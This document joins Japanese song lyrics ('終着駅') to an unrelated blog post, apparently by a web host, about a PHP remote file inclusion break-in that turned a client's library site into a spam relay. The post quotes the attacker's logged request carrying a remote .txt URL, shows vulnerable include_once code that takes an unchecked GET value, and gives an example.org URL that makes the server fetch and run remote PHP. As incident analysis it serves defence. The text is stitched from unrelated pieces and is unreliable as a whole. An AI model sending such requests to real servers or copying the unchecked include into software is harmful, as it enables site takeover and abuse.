終着駅

終着駅

唄:稲垣潤一
詞:秋元康
曲:松本俊明

いつもの街が
いつもと違う
僕たちの角度が
離れた分だけ

君の背中に
重なり合った
人込みは やさしい味方

出逢う時は 偶然でも
別れは 2人のせい

終着駅で
愛が終われば
再会できると
噂に聞いた
終着駅で
君を想えば
いつの日か きっと
もう一度

僕の言葉で
言い尽くせない
後悔は 誤解の痛み

淋しさなら 紛らせても
愛しさ 止められない

始発駅まで
1人歩けば
思い出ばかりと
すれ違うけど
始発駅まで
2人歩いた
なつかしい日々に
また逢える

終着駅で
愛が終われば
再会できると
噂に聞いた
終着駅で
君を想えば
2人折り返す
始発駅

Security Issue in PHP – include_once

There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I go the the php file and know how the cracker crack the system. The problem is about php.

<?php
...
$pagename =$_GET['Name'];
...
?>
...
<?php include_once("{$pagename}_main.inc");?>
...

The problem is that the $pagename does not have any gruad to check the value that got by $_Get[‘name’].

The function of include_once is allow to include the source from outside, http://example.com/aaa.php

So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>

That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.

So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.